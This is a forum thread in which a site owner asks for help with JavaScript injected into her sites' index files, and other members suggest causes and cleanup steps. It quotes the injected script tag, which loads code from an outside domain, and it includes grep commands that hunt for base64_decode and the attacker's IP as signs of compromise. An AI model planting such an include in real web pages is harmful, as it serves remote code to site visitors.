1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Anybody know anything about JavaScript Code Insertion into Files?

Discussion in 'Black Hat SEO Tools' started by MissLinda, May 11, 2011.

  1. MissLinda

    MissLinda Newbie

    Joined:
    Feb 3, 2010
    Messages:
    31
    Likes Received:
    0
    Hi Guys,

    About 10 websites on my server have been infected.
    All of my index.php, index.htm and index.html files have the same problem with different codes:

    this is an example

    <script type=" text/javascript" src=" http://teepak4you.com/counter.js"></script>

    There is hundreds and hundreds of them

    After i clean them...theey appear again...a few days later

    I switched servers...uploaded all clean/new files...and a week later same thing

    Anybody know how to fix?
     
  2. Drink More Tea

    Drink More Tea Regular Member

    Joined:
    Apr 15, 2011
    Messages:
    208
    Likes Received:
    166
    Can I ask what sort of hosting your sites are on? ie shared/dedicated ?

    It may well be that you are on a server with other sites which are poorly configures or not updated to the latest version of whatever software they use.

    The other thing I can think of is that it might be an sql injection into some insecure part of your site, or it may well be that you are using an exploitable version of some software on your server, which could only be resolved by upgrading to the latest version.

    It might also be a previously unknown 0day exploit, in which case there is next to nothing you could do.
     
  3. futurestic06

    futurestic06 Supreme Member

    Joined:
    Apr 16, 2011
    Messages:
    1,204
    Likes Received:
    146
    i think you are using shared server. and yes if the software is not updated regularly then it is possible to appear this type of problems.
     
  4. JenniferMartin

    JenniferMartin Regular Member

    Joined:
    Jan 29, 2011
    Messages:
    391
    Likes Received:
    699
    Hey Linda, you are using some nulled and infected script on your websites and that script is causing the issues.
     
  5. MissLinda

    MissLinda Newbie

    Joined:
    Feb 3, 2010
    Messages:
    31
    Likes Received:
    0
    Hi guys,

    Thanks for the replies

    All my stuff is up to date. I use wordpress with phpbb forum

    All up to date

    Moved servers, have firewalls, checked SQL and FTP and all

    found this file though... js.php that has a code that is an ip address which leads to Latvia... should i remove that file?

    Does it do anything

    A security website wants to charge me $2500 to update my website security and clean it all out
     
  6. roamer

    roamer Power Member

    Joined:
    Dec 2, 2008
    Messages:
    500
    Likes Received:
    479
    Occupation:
    Gfx designer, vfx and mgfx
    Location:
    plɹoʍ ǝɥʇ punoɹɐ ƃuıɯɐoɹ
    If you have changed all variables everytime BUT the files, then there most be something in there. That file is probably the culprit. Paste the code using code tags, at least the relevant section of it.
     
  7. Drink More Tea

    Drink More Tea Regular Member

    Joined:
    Apr 15, 2011
    Messages:
    208
    Likes Received:
    166
    There is a project of that name which is listed here : hxxp://phpjs.org/pages/home

    The source code of it is available, so you could probably use diff and grep to see if the match or not.
     
  8. TogaPartee

    TogaPartee Newbie

    Joined:
    May 5, 2011
    Messages:
    42
    Likes Received:
    14
    - in your control panel, do you have option to archive logs? usually server logs get deleted every day but if your host has cpanel then there is option to archive - e.g. retain all the logs : having raw logs gives you the ability to see what the hacker did
    - what is the date of the javascript file? there is a good chance your hacker was active on the same date and logs from that date would be a good clue
    - double check those mysql databases for extra users with ADMIN rights
    - if you have ssh access - you may need to request one from your host, then you can run some very useful commands, for example searching all files in your website directory that contain certain footprints of hacking

    one ssh command would be
    Code:
    grep -r "base64_decode(" substitute_with_your_directory >base65_decode.txt
    or

    Code:
    grep -r "IP_address_of_the_Latvia_server" substitute_with_your_directory >badboyip.txt
    make sure to change substitute_with_your_directory to a directory name on your server (for example on cpanel servers it would be public_html )

    these ssh commands search all files in the given directory for a string, in the fist case its a string
    base64_decode(
    in the second case your would substitute IP_address_of_the_Latvia_server with the actual IP address from Latvia

    then you would end up with two files named
    base65_decode.txt
    and that file would give you a list of all files on your server that contain the text string
    The file named badboyip.txt would contain all files on your server that have that IP address in them
     
  9. beakon

    beakon Regular Member

    Joined:
    Aug 4, 2010
    Messages:
    351
    Likes Received:
    94
    I had this happen to a lot of my sites on shared hosting on godaddy about a year ago. What a pain in the ass this was. I basically just downloaded my entire servers content, and did mass file search and replaces for all the infected code. Then re-uploaded it all again.